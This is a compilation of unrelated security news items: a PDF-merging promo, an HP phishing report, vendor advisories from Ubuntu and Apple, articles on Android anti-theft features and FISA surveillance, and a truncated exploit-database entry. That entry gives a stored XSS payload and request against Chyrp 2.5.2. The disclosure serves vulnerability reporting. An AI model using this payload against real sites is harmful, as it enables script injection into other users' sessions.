By Uzair Amir
Discover time-saving document merging strategies for professionals. Learn how to streamline workflows, enhance collaboration, and protect document integrity for increased productivity and peace of mind.
This is a post from HackRead.com Read the original post: Efficient Document Merging Strategies for Professionals

Professionals often struggle with managing huge amounts of data spread across various files. A study from COVEO found that employees spend 3.6 hours a day — nearly half their workday — just looking for documents. This means 45% of the workday is spent just on finding documents, a time that could be used more effectively.

One of the solutions to this challenge is to merge PDF files. By combining files that go together, you simplify workflows and save time in your daily processes.

In this article, we’ll offer practical strategies and tips for efficient document merging, helping professionals focus on producing quality work for their clients. 

****Manual Merging Techniques****

Manual merging allows you to pick and choose the pages you want to join together to determine how your final PDF document will appear.

****Using built-in software features for document merging****

For Mac users, utilizing the built-in preview tool makes document merging a breeze. Windows users will need a third-party application or an online tool for this task.

To merge PDFs on Mac using Preview:

*   Open the PDFs you want to combine in the Preview app on your Mac.
*   In each open PDF, go to View > Thumbnails to see page thumbnails in the sidebar.
*   Simply drag and drop the thumbnails you wish to include into the thumbnail sidebar of another PDF.
*   Rearrange pages by dragging thumbnails as needed. You can choose which pages should be excluded from the final document.
*   To save your final file, navigate to File > Export as PDF.

****Step-by-step guide for manual merging in various applications****

Wondering how merging works with other systems? The process is surprisingly straightforward and doesn’t demand any technical know-how. Moreover, it tends to follow a similar pattern across various applications.

This is a typical step-by-step guide.

*   Select and install your preferred tool or access an online platform. Be sure to go for the best PDF editor online when choosing.
*   Choose the PDF files you want to combine from either your device or cloud services such as Google Drive or Dropbox.
*   Customize the settings like page sequence, compression levels, security features, etc. You can also remove unwanted pages from the list or rearrange them as necessary.
*   Initiate the merge operation by clicking on “Merge.” The duration may vary from seconds to minutes, depending on file sizes.
*   Once done, save your final PDF in a location of your choice for future reference.

****Best practices for ensuring accuracy and consistency in manual merging****

When manually merging PDF documents, it’s important to follow best practices to ensure accuracy and consistency in the merged document. 

Here are some tips:

*   Review each document thoroughly before combining them to ensure content accuracy and proper order. While there are tools that allow you to do text editing online, it’s always best to be sure from the beginning.
*   Maintain consistent formatting and layout throughout the merged document.
*   Double-check for any errors or inconsistencies after process completion.
*   Always keep a backup of the original PDFs to prevent data loss.

****Automated Merging Solutions****

Technology has transformed document management with the creation of automated merging solutions. These tools make it easy to edit PDF file types and combine multiple documents or data sources into one, saving significant time and effort. Traditionally manual tasks, like compiling reports from various departments or joining different types of correspondence, are now more efficient.

Automated merging tools use algorithms and artificial intelligence (AI) to find, match, and combine content. This ensures the final document is coherent and consistently formatted. They’re compatible with many file types, including Word documents, PDFs, and spreadsheets (for when you want to make a fillable PDF), making them a versatile addition to any professional’s toolkit.

****Comparison of popular software solutions for automated merging****

Let’s compare some of the popular tools that professionals can use to merge PDF files.

**Tool**

**Adobe Acrobat**

**PDFsam (PDF Split and Merge)**

**Smallpdf**

**Lumin**

Features

Comprehensive PDF solution with advanced tools to edit PDF text, convert, review, merge, etc.

Open-source with basic and advanced merging capabilities

Web-based solution with various PDF tools

Web-based PDF solution with editing capabilities and Google Drive integration

Ease of Use

Feature-rich but with a steeper learning curve

Relatively straightforward for basic tasks. Advanced features may require familiarity

Simple drag-and-drop interface for quick merging

User-friendly interface, integrates with Google

Platforms

Windows, macOS

Windows, macOS, Linux

Windows, Mac, iOS, or Android device

Web-based, integrates with Google Drive

Pricing

Subscription-based plans

Free (PDFsam Basic), paid (PDFsam Enhanced)

Free and paid subscription plans with additional features

Free and paid subscription plans with additional features

****Benefits and limitations of automation in document merging******Benefits:**

*   **Efficiency:** Automation boosts efficiency, saving time for strategic tasks.
*   **Accuracy:** Automated tools enhance accuracy, reducing errors in merged documents.
*   **Scalability:** These solutions are scalable and can handle large document volumes.
*   **Flexibility:** Supports a wide range of document formats and merging scenarios, accommodating diverse professional needs.

****Limitations****

*   **Setup complexity:** Advanced tools may have a steep learning curve.
*   **Cost:** Premium tools’ fees may be high for small businesses.
*   **Privacy and security:** Online tools risk data confidentiality.
*   **Software dependence:** Reliance may cause compatibility or obsolescence issues.

****Advanced Merging Strategies********Customizing merging processes for specific needs****

Customization is key in document management because documents vary widely in format, purpose, and complexity. Tailoring tools to specific needs ensures accuracy. For example, you can program software to handle different sections of documents, like headers or footers. You can also merge documents based on criteria like date, author, or relevance.

This approach helps preserve important details such as the document’s author, creation date, and history. Using advanced tools for scripting and automation simplifies the process. It saves time and reduces the chance of errors.

****Implementing batch merging and bulk processing techniques****

Batch merging and bulk processing help manage large document volumes effectively. This method merges many documents at once, using specific criteria to speed up work on big projects or regular tasks. Understanding the software well is necessary, and sometimes specialized software is needed for handling lots of documents.

Organizations like law firms, banks, and research groups find these techniques very useful. They automate joining large document batches, cutting down manual work significantly. This saves time and improves workflow, letting teams focus on other important tasks.

****Integrating merging tools into existing workflows for maximum efficiency****

Integrating merging tools directly into existing workflows transforms document management, automating the process for increased efficiency. By syncing with project management, CRM, and ERP systems, documents automatically update with key events, like project completions or new clients. 

This integration also enables users to edit PDF form types seamlessly, boosting collaboration. While setup demands planning and development, the result is a significant boost in productivity and streamlined operations.

****Collaboration and Sharing Considerations****

**Compatibility and consistency**: For effective collaboration, it’s essential to ensure document compatibility and maintain consistency by standardizing formats and tools. This prevents formatting issues and data loss, making cross-platform tools key for merging documents smoothly across diverse sources.

**Sharing and distribution of merged documents:** Securing merged documents, especially those with sensitive information, requires encrypted transfers and strict access controls to ensure only authorized access. Use platforms with robust security protocols and customizable permissions for safe distribution.

**Version control and tracking changes:** Effective version control and change tracking ensure document integrity and transparency among collaborators. Using systems that log version history and changes help everyone stay aligned and informed, especially when there is a need to edit scanned PDF documents, enhancing collaboration and keeping the document current.

**Conclusion**

As we close, remember document merging does more than organize files. It saves time for crucial work, boosts team collaboration, and protects your documents’ integrity. The strategies shared equip you to confidently manage large volumes of documents, turning chaos into order. 

Another important key is to choose a reliable tool that can help with your document management processes. The good news is that there are lots of them to choose from – PC, Mac, Mobile, and Cloud-based. Even if you want to create a fillable PDF free from your files, rest assured that there is a suitable tool for your needs.

By adopting these practices, you can increase productivity and achieve peace of mind, knowing that your document management tasks are efficiently handled.

1.  Best Paid and Free OSINT Tools for 2024
2.  Top 3 Cybersecurity Tools to Protect Business Data
3.  PDF Security – How To Keep Data Secure in a PDF File
4.  The new Wondershare PDFelement with added features
5.  The Essential Tools and Plugins for WordPress Development

Efficient Document Merging Strategies for Professionals

By Waqas
New HP report reveals cybercriminals are increasingly leveraging "cat-phishing" techniques, exploiting open redirects in legitimate websites to deceive users and deliver malware.
This is a post from HackRead.com Read the original post: HP Exposes Low-Effort, High-Impact Cat-Phishing Targeting Users

A new report from HP has revealed a troubling trend where cybercriminals are increasingly using “cat-phishing” tactics to deceive unsuspecting victims. The report, published on May 16, 2024, as part of the quarterly HP Wolf Security Threat Insights series, exposes how attackers are exploiting **open redirect vulnerabilities** and other Living-off-the-Land techniques to bypass traditional security measures.

****What is Cat-Phishing?****

The term “cat-phishing” refers to a method where cybercriminals manipulate seemingly legitimate links to **redirect users to malicious websites** without their knowledge. This deceptive practice makes it nearly impossible for the average user to distinguish between a safe and a compromised site, thus facilitating the success of phishing attacks.

****Notable Campaigns Identified by HP Threat Researchers****

1.  **WikiLoader Campaign:** In a sophisticated operation, attackers leveraged open redirect vulnerabilities within reputable websites, often through compromised ad embeddings, to redirect users to malicious domains. This technique exploits the trust users have in well-known sites, making it difficult for security systems to flag malicious activity.
2.  **Living-off-the-BITS:** Several campaigns abused the Windows Background Intelligent Transfer Service (BITS) – a legitimate mechanism used by programmers and system administrators to download or upload files to web servers and file shares. This LotL technique helped attackers remain undetected by using BITS to download the malicious files.
3.  **Abuse of Windows BITS:** Several campaigns were found to misuse the Windows Background Intelligent Transfer Service to download malicious files covertly. By utilizing a legitimate system component, attackers can maintain a low profile, evading standard detection mechanisms.
4.  **Fake Invoices Leading to HTML Smuggling Attacks:** HP identified a tactic where threat actors concealed malware within HTML files disguised as delivery invoices. Once opened in a web browser, these files initiate a series of events that deploy open-source malware like **AsyncRAT**. The lack of effort in designing the lure suggests a low-cost, high-volume approach.
5.  **Ursnif Returns:** **Ursnif**, also known as Gozi or IFSB malware targets Windows devices and first appeared in 2006. In the first quarter of 2024, HP researchers identified the return of Ursnif as part of different malicious spam campaigns against users in Italy.

A fake invoice dropping Ursnif malware (Screenshot: HP)

****Other Findings****

Other findings in the report highlight that at least 12% of email threats managed to evade detection. The primary threat vectors identified during the first quarter included email attachments, accounting for 53%, followed by downloads from browsers at 25%, and other infection vectors at 22%.

Notably, there has been a notable growth in document threats, with **exploits surpassing macros** as the preferred method of executing malicious code, constituting at least 65% of document-based threats.

****Expert Insights****

In a **press release,** Dr. Ian Pratt, Global Head of Security for Personal Systems at HP Inc., emphasized the limitations of relying solely on detection in the face of Living-off-the-Land techniques. He advocated for a defence-in-depth approach, including threat containment, to mitigate risks effectively.

_“_Targeting companies with invoice lures is one of the oldest tricks in the book, but it can still be very effective and hence lucrative. Employees working in finance departments are used to receiving invoices via email, so they are more likely to open them. If successful, attackers can quickly monetize their access by selling it to cybercriminal brokers, or by deploying ransomware.”

**Patrick Harr**, CEO at SlashNext, pointed out the prevalence of open redirects and other deceptive techniques in email and messaging platforms. He underscored the need for AI-based security solutions that utilize computer vision and URL sandboxing/behavioural analysis to counter these advanced threats.

****Conclusion****

The HP Wolf Security Threat Insights Report is just another piece of evidence showing how cybercriminals have mastered the art of deceiving unsuspecting businesses and individuals. Organizations must move beyond detection-centric security and adopt a defence-in-depth strategy, incorporating threat mitigation and **advanced technologies like AI** to effectively combat sophisticated attacks, including the growing threat of “cat-phishing.”

1.  Check Point Research: Microsoft the Most Phished Brand
2.  Google, Microsoft and Oracle generated most vulnerabilities
3.  Microsoft Office Most Exploited Software in Malware Attacks
4.  Malicious Office documents make up 43% of all malware downloads
5.  HP Claims Monopoly on Ink, Alleges 3rd-Party Cartridge Malware Risk

HP Exposes Low-Effort, High-Impact Cat-Phishing Targeting Users

Ubuntu Security Notice 6766-2 - It was discovered that the Open vSwitch implementation in the Linux kernel could overflow its stack during recursive action operations under certain conditions. A local attacker could use this to cause a denial of service. Sander Wiebing, Alvise de Faveri Tron, Herbert Bos, and Cristiano Giuffrida discovered that the Linux kernel mitigations for the initial Branch History Injection vulnerability were insufficient for Intel processors. A local attacker could potentially use this to expose sensitive information.

Ubuntu Security Notice USN-6766-2

Compared to fuzzing for software vulnerabilities on Linux, where most of the code is open-source, targeting anything on macOS presents a few difficulties.

Talos releases new macOS open-source fuzzer

The Microsoft Threat Intelligence team said it has observed a threat it tracks under the name Storm-1811 abusing the client management tool Quick Assist to target users in social engineering attacks.
"Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware," the company said in a report published on May 15, 2024.
The

Cybercriminals Exploiting Microsoft’s Quick Assist Feature in Ransomware Attacks

Google is introducing new AI-powered safety tools in Android 15 that can lock down your phone if thieves nab it.

Billions of Android phones are getting new tools to stop phone thieves from accessing your information and to slow down their criminal behavior, Google announced today at its I/O developer conference. Android phones will soon use artificial intelligence to automatically detect when they have been snatched from your hand and lock themselves, as part of the new changes that include adding extra protections to secure your phone if it has been stolen.

The upgrades—some of which will come with the Android 15 operating system, while others will be compatible with older phones—come as phone companies are increasingly building extra measures into their software to thwart rampant levels of phone thefts and further protect people’s data. As well as the stolen phone tools, Google is introducing new changes to Android 15 that will scan how apps are using “sensitive permissions” in real time to detect potentially suspicious app activities.

Around the world, phone thefts are a huge problem—in London, for example, a phone is stolen every six minutes. Thieves riding electric bikes or scooters can snatch phones out of people’s hands, pickpockets can easily nab devices from bags, and others are known to peer over shoulders to learn a phone’s PIN before they steal the device.

Stolen phones can be resold if they are unlocked or passed on to others who can break them down for parts and sell those components. However, some criminals will also try to access banking or crypto apps and transfer money. “The thieves profit from the physical device themselves, but they also increasingly are trying to get into the content of the device, where the most valuable data is stored,” Jianing Sandra Guo, an Android security and privacy product manager at Google, tells WIRED. Some thieves, if they have a locked phone, spam people with phishing emails and messages to friends to try and get login details.

Google’s anti-theft tools have been designed to add more protection before a phone is stolen, during the theft, and after a phone has been taken, Guo explains. In keeping with Google’s and the wider tech industry’s push, some of these have been built using artificial intelligence as a key component.

Courtesy of Google

Android’s new Theft Detection Lock uses Google’s AI to determine when your phone has been snatched from your hand. If it detects this, the phone’s screen will automatically be locked. Using smartphone sensors, such as the accelerometer and gyroscope, Google trained its algorithms to detect sudden changes in the phone’s positioning and the motions that might indicate it has been snatched.

“There’s a grabbing of the phone, changing hands, and then an attacker running, biking, or even driving away with a device,” Guo says. To train the algorithm, Google’s research staff studied how phones are commonly stolen, then its teams re-created snatching events against each other to collect data about what a simulated theft looks like.

Thieves stealing phones, Guo says, will often open the camera app when they don’t know the phone’s PIN, to stop them from losing access to the device. They also often try to disconnect it from cell networks for a long period of time so they can’t be locked out of the device remotely. The company’s new Offline Device Lock will lock your screen when the phone is offline for an extended period of time, if the setting is turned on.

To increase protections before a phone is stolen, Google says in a blog post, the company is adding four data protection features that can help keep your information locked down. The first stops your phone from being set up after a factory reset, unless the person knows your login details. “This renders a stolen device unsellable, reducing incentives for phone theft,” Google vice president Suzanne Frey writes.

There’s also a new “private spaces” option where you can store sensitive apps, such as banking apps, that require a second PIN or use of your biometrics, such as a fingerprint, to access. There are also extra authentication controls being put in place: If a thief tries to disable Google's Find My Device location-tracking service they will need to also use your PIN, password, or biometric information to unlock it. If a thief does know your PIN, it will also be possible to turn on the need for biometric authentication to make changes to important Google account and device settings, such as a PIN change or turning off anti-theft settings.

The extra authentication features are similar to those introduced by Apple in its Stolen Device Protection system that debuted in iOS 17.3 earlier this year, although Google’s theft motion detection goes further than these tools. The aim of all anti-theft options is to lock down the information stored on phones but also to make it harder for criminals to abuse devices when they have them. Making it more difficult for criminals to resell phones or transfer money may help to deter thefts.

If your phone does get stolen, Android already allows phones to be locked and wiped. However, Guo says, the experience of having a phone swiped from your hands is a “traumatic” experience, and in the aftermath, people may not remember all their Google account login details to close off access to the phone. To address this, Google’s new Remote Lock feature will allow people to lock their phone using just a phone number. “The content of the device is protected, and it buys the user a lot of time … to be able to organize themselves and do further remediation,” Guo says.

Google’s new protections around factory resets will launch with Android 15, while some of the other features will be available later this year. Guo says that, where possible, Google has tried to make the features work on versions of the software as old as Android 10.

Aside from the anti-phone-theft tools, Android is coming with other security and privacy updates. Google’s app safety system, Google Play Protect, scans billions of apps every day to detect malware, but now this is being expanded to do live scanning on people’s phones to better detect suspicious behavior. “With live threat detection, Google Play Protect’s on-device AI will analyze additional behavioral signals related to the use of sensitive permissions and interactions with other apps and services,” Dave Kleidermacher, a Google vice president, writes in a blog post.

Other security-related updates to Android 15 include hiding notifications and one-time passwords from appearing if you are sharing your phone’s screen with others, hiding login details if you are logging in to an app or website while sharing your screen, and identifying when cell connections are unencrypted and alerting people if there is a “potential false cellular base station” or IMSI catcher nearby that is logging a user’s phone.

_Updated 2:45 pm ET, May 15, 2024, to clarify that several new features will be included in updates that are separate from Android 15 itself, according to Google._

Android Update: Theft Detection Lock Knows When Your Phone Is Stolen

Apple Security Advisory 05-13-2024-4 - macOS Sonoma 14.5 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-05-13-2024-4 macOS Sonoma 14.5

macOS Sonoma 14.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT214106.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

AppleAVD  
Available for: macOS Sonoma  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-27804: Meysam Firouzi (@R00tkitSMM)

AppleMobileFileIntegrity  
Available for: macOS Sonoma  
Impact: A local attacker may gain access to Keychain items  
Description: A downgrade issue was addressed with additional code-  
signing restrictions.  
CVE-2024-27837: Mickey Jin (@patch1t) and ajajfxhj

AppleMobileFileIntegrity  
Available for: macOS Sonoma  
Impact: An attacker may be able to access user data  
Description: A logic issue was addressed with improved checks.  
CVE-2024-27816: Mickey Jin (@patch1t)

AppleMobileFileIntegrity  
Available for: macOS Sonoma  
Impact: An app may be able to bypass certain Privacy preferences  
Description: A downgrade issue affecting Intel-based Mac computers was  
addressed with additional code-signing restrictions.  
CVE-2024-27825: Kirin (@Pwnrin)

AppleVA  
Available for: macOS Sonoma  
Impact: Processing a file may lead to unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2024-27829: Amir Bazine and Karsten König of CrowdStrike Counter  
Adversary Operations, and Pwn2car working with Trend Micro's Zero Day  
Initiative

AVEVideoEncoder  
Available for: macOS Sonoma  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2024-27841: an anonymous researcher

CFNetwork  
Available for: macOS Sonoma  
Impact: An app may be able to read arbitrary files  
Description: A correctness issue was addressed with improved checks.  
CVE-2024-23236: Ron Masas of Imperva

Finder  
Available for: macOS Sonoma  
Impact: An app may be able to read arbitrary files  
Description: This issue was addressed through improved state management.  
CVE-2024-27827: an anonymous researcher

Kernel  
Available for: macOS Sonoma  
Impact: An attacker may be able to cause unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2024-27818: pattern-f (@pattern_F_) of Ant Security Light-Year Lab

Libsystem  
Available for: macOS Sonoma  
Impact: An app may be able to access protected user data  
Description: A permissions issue was addressed by removing vulnerable  
code and adding additional checks.  
CVE-2023-42893: an anonymous researcher

Maps  
Available for: macOS Sonoma  
Impact: An app may be able to read sensitive location information  
Description: A path handling issue was addressed with improved  
validation.  
CVE-2024-27810: LFY@secsys of Fudan University

PackageKit  
Available for: macOS Sonoma  
Impact: An app may be able to gain root privileges  
Description: A logic issue was addressed with improved restrictions.  
CVE-2024-27822: Scott Johnson, Mykola Grymalyuk of RIPEDA Consulting,  
Jordy Witteman, and Carlos Polop

PackageKit  
Available for: macOS Sonoma  
Impact: An app may be able to elevate privileges  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-27824: Pedro Tôrres (@t0rr3sp3dr0)

PrintCenter  
Available for: macOS Sonoma  
Impact: An app may be able to execute arbitrary code out of its sandbox  
or with certain elevated privileges  
Description: The issue was addressed with improved checks.  
CVE-2024-27813: an anonymous researcher

RemoteViewServices  
Available for: macOS Sonoma  
Impact: An attacker may be able to access user data  
Description: A logic issue was addressed with improved checks.  
CVE-2024-27816: Mickey Jin (@patch1t)

SharedFileList  
Available for: macOS Sonoma  
Impact: An app may be able to elevate privileges  
Description: A logic issue was addressed with improved checks.  
CVE-2024-27843: Mickey Jin (@patch1t)

Shortcuts  
Available for: macOS Sonoma  
Impact: A shortcut may output sensitive user data without consent  
Description: A path handling issue was addressed with improved  
validation.  
CVE-2024-27821: Kirin (@Pwnrin), zbleet, and Csaba Fitzl (@theevilbit)  
of Kandji

StorageKit  
Available for: macOS Sonoma  
Impact: An attacker may be able to elevate privileges  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2024-27798: Yann GASCUEL of Alter Solutions

Sync Services  
Available for: macOS Sonoma  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed with improved checks  
CVE-2024-27847: Mickey Jin (@patch1t)

udf  
Available for: macOS Sonoma  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved checks.  
CVE-2024-27842: CertiK SkyFall Team

Voice Control  
Available for: macOS Sonoma  
Impact: An attacker may be able to elevate privileges  
Description: The issue was addressed with improved checks.  
CVE-2024-27796: ajajfxhj

WebKit  
Available for: macOS Sonoma  
Impact: An attacker with arbitrary read and write capability may be able  
to bypass Pointer Authentication  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 272750  
CVE-2024-27834: Manfred Paul (@_manfp) working with Trend Micro's Zero  
Day Initiative

Additional recognition

App Store  
We would like to acknowledge an anonymous researcher for their  
assistance.

CoreHAP  
We would like to acknowledge Adrian Cable for their assistance.

HearingCore  
We would like to acknowledge an anonymous researcher for their  
assistance.

Managed Configuration  
We would like to acknowledge 遥遥领先 (@晴天组织) for their assistance.

Music  
We would like to acknowledge an anonymous researcher for their  
assistance.

PackageKit  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

Safari Downloads  
We would like to acknowledge Arsenii Kostromin (0x3c3e) for their  
assistance.

macOS Sonoma 14.5 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmZCs7MACgkQX+5d1TXa  
IvqKHhAApqwSNiF1fzn2XOuX2AH9sPVTbcdRTlWmD9lOfTnvinbn8J0oNSFoXxDS  
9NqJclCmrl4E/o9d1mUrV9ys1lAI/Hm0E3Hq2VmrEzd4umlDeRvGN2qFuqF+JnEc  
svHlZcAmGpN9eMvxwMin+PXqchqXItZeAwbE2UzD+xTxQftoe/SNSgIlTkncBsMO  
kKS3hlGcNH9fIJhvWY0f7NfX6XKmbxtK6+Glx652v0ayvNmtloBMer+lcy7VcNkL  
Na3bykhiALpwon07xGYmzCn6TsrLhsF4bwsXwdJAmKSJ3s/I8o2SITJtxmRMxv2I  
DXANRFtC+WaaVqmvOC22XcLuFDvKTH719AcdmxDwBLUQ4P1nQEvObp2OLskayhCp  
oEQPrgSWQerdwNse4Hv3JuQrxJWeKCgHTBbWPvfPL5DCX9u8xy/5QgJevrv8RX3g  
hOxqYtIdLKzGuJZWapgd0Cv+InrId5j0xcaUvGxA33lkTeYiOgXQIqjtvOJRNYqK  
2cS59vJkn3j+RwuVjVf27q802Jt1ET75eEMFVf0VJUvWWkGfOWpHvXs3qiUJYgqX  
TQcZIpZL1W4jpMjYtjqk9sf6thL2xb5eXv7BDBfiRIQJYUrTlyQKlIH9xbSH4wNA  
XyKKhjtfx9dsPI0wceBVBA5BCGrnlqNBtOr3+8OzcWFCe0qWOKc=  
=NXp8  
-----END PGP SIGNATURE-----

Apple Security Advisory 05-13-2024-4

A coalition of digital rights groups is demanding the US declassify records that would clarify just how expansive a major surveillance program really is.

Last month, US president Joe Biden signed a surveillance bill enhancing the National Security Agency’s power to compel US businesses to wiretap communications going in and out of the country. The changes to the law have left legal experts largely in the dark as to the true limits of this new authority, chiefly when it comes to the types of companies that could be affected. The American Civil Liberties Union and organizations like it say the bill has rendered the statutory language governing the limits of a powerful wiretap tool overly vague, potentially subjecting large swaths of corporate America to warrantless and secretive surveillance practices.

In April, Congress rushed to extend the US intelligence system’s “crown jewel,” Section 702 of the Foreign Intelligence Surveillance Act (FISA). The spy program allows the NSA to wiretap calls and messages between Americans and foreigners abroad—so long as the foreigner is the individual being “targeted” and the intercept serves a significant “foreign intelligence” purpose. Since 2008, the program has been limited to a subset of businesses that the law calls “electronic communications service providers,” or ECSPs—corporations such as Microsoft and Google, which provide email services, and phone companies like Sprint and AT&T.

In recent years, the government has worked quietly to redefine what it means to be an ECSP in an attempt to extend the NSA’s reach, first unilaterally and now with Congress’ backing. The issue remains that the bill Biden signed last month contains murky language that attempts to redefine the scope of a critical surveillance program. In response, a coalition of digital rights organizations, including the Brennan Center for Justice to the Electronic Frontier Foundation, is pressing the US attorney general, Merrick Garland, and the nation’s top spy, Avril Haines, to declassify details about a relevant court case that could, they say, shed much-needed light on the situation.

In a letter to the top officials, more than 20 such organizations say they believe the new definition of an ECSP adopted by Congress might “permit the NSA to compel almost any US business to assist” the agency, noting that all companies today provide some sort of “service” and have access to equipment on which “communications” are stored.

“Deliberately writing overbroad surveillance authorities and trusting that future administrations will decide not to exploit them is a recipe for abuse,” the letter says. “And it is entirely unnecessary, as the administration can—and should—declassify the fact that the provision is intended to reach data centers.”

The Justice Department confirmed receipt of the letter on Tuesday but referred WIRED to the Office of the Director of National Intelligence, which has primary purview over declassification decisions. The ODNI has not responded to a request for comment.

It is widely believed—and has been reported—that data centers are the intended target of this textual change. Matt Olsen, the assistant US attorney general for national security, appeared on an April 17 episode of the _Lawfare_ podcast to say that, while unable to confirm or deny any specifics, data centers today store a significant amount of communications data and are an “example” of why the government viewed the change as necessary.

A DOJ spokesperson pointed WIRED to an April 18 letter by Garland that claims the new ECSP definition is “narrowly tailored.” The letter includes written reflections on the provision by the assistant attorney general, Carlos Uriarte, who writes that the “fix” is meant to address a “critical intelligence gap” resulting from changes in technology over the past 15 years. According to Uriarte, the DOJ has committed to applying the new definition internally “to cover the type of service provider at issue” before the court.

Ostensibly this means the government is promising to limit future surveillance directives to data centers (in addition to the companies traditionally defined as ECSPs).

The surveillance court that oversees FISA and the appeals court that reviews its decisions sided two years ago with an unidentified company that fought back after being served an NSA order. Both courts ruled that it did not, in fact, appear to meet the criteria for being considered an ECSP, as only part of its function was storing communications data. Finding the government’s interpretation of the statute overly broad, the court reminded the government that only Congress has the “competence and constitutional authority” to rewrite the law.

Digital rights groups argue that declassifying additional information about this FISA case may help the public understand which types of businesses are actually subject to NSA directives. Practically speaking, they say, that information is no longer a secret anyway. “Declassifying this information would cause little if any national security harm,” the letter says. “The New York Times has already revealed that the relevant FISC case addressed data centers for cloud computing.”

In the aftermath of the FISA court’s ruling, the NSA and other spy agencies began lobbying the House and Senate intelligence committees to aid the administration in redefining what it means to be an ECSP. Members of both committees have subsequently portrayed the court’s ruling as a “directive” that Congress needs to expand the NSA’s reach. In a floor speech last month, Mark Warner, the chair of the Senate Intelligence Committee, said, “So what happened was, the FISA Court said to Congress: You guys need to close this loophole; you need to close this and change this definition.”

But in fact what the court asserted was that the government had exceeded its authority and that it was Congress’ job, not the Justice Department’s, to revise the law. “Any unintended gap in coverage revealed by our interpretation is, of course, open to reconsideration by the branches of government whose competence and constitutional authority extend to statutory revision,” the court said.

This would culminate in new language being proposed that quickly alarmed legal experts, including top civil liberties attorneys who’ve appeared before the secret court in the past. The surveillance fears quickly spread to Silicon Valley. The Information Technology Industry Council, one of the tech industry's top lobbying arms, warned that companies like Facebook and IBM were interpreting the bill as having “vastly expanded the US government’s warrantless surveillance capabilities.”

This expansion, the firm added, would also hinder the “competitiveness of US technology companies” and arguably imperil the “continued global free flow of data between the US and its allies.” Customers internationally, it argued, would likely begin taking their business elsewhere should the US government turn data centers into surveillance watering holes.

Concerns about the new ECSP definition have been circulating since December. While largely dismissing them, members of the House and Senate intelligence committees made a few adjustments in February, exempting a handful of business types. This came in response to popular concerns that Starbucks employees and hotel IT staff might be secretly conscripted by the NSA. FISA experts such as Marc Zwillinger—a private attorney who has appeared twice before the FISA Court of Review—noted in response to those adjustments that Congress’ rush to exempt a handful of businesses only served to demonstrate that the text was inherently too broad.

Intelligence committee members kept the pressure on lawmakers to reauthorize the Section 702 program with the sought-after language, going as far as to suggest that another 9/11-style attack might occur if they failed. The power of the committees was on full display, as while neither actually have primary jurisdiction over FISA, a majority of the Section 702 bill that passed was authored by intelligence committee staff.

Even while supporting the new framework and dismissing the intensity of civil society’s concerns, Warner did eventually step forward to acknowledge the new ECSF definition needed additional tweaking. First, on the Senate floor in April, he said that Garland shared his “view” that the language “could have been drafted better.” Later, in response to questions from reporters, he added: “I’m absolutely committed to getting that fixed.”

That appears unlikely to happen soon. According to The Record, Warner indicated that the best time to update the language again would be in the “next intelligence bill,” presumably referring to legislation this fall broadly reauthorizing the intelligence community’s work.

In the meantime, however, more than half of Congress is running for election, and the next US president will have greater surveillance powers than any other before. No one can say for sure who that president will be or how they’ll make use of that authority.

_Updated 2:20 pm ET, May 14, 2024, to clarify statements by Matt Olsen, assistant US attorney general for national security, to the_ Lawfare _podcast._

Secrecy Concerns Mount Over Spy Powers Targeting US Data Centers

Chryp version 2.5.2 suffers from a persistent cross site scripting vulnerability.

    # Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)# Date: 2024-04-24# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://github.com/chyrp/# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip# Version: 2.5.2# Tested on: MacOS### Steps to Reproduce ###- Login from the address: http://localhost/chyrp/?action=login.- Click on 'Write'.- Type this payload into the 'Title' field: "><img src=x onerror=alert("Stored")>- Fill in the 'Body' area and click 'Publish'.- An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /chyrp/admin/?action=add_post HTTP/1.1Host: localhostCookie: ChyrpSession=c4194c16a28dec03e449171087981d11;show_more_options=trueUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)Gecko/20100101 Firefox/124.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------28307567523233313132815561598Content-Length: 1194Origin: http://localhostReferer: http://localhost/chyrp/admin/?action=write_postUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="title""><img src=x onerror=alert("Stored")>-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="body"<p>1337</p>-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="status"public-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="slug"-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="created_at"04/24/24 12:31:57-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="original_time"04/24/24 12:31:57-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="trackbacks"-----------------------------28307567523233313132815561598Content-Disposition: form-data; 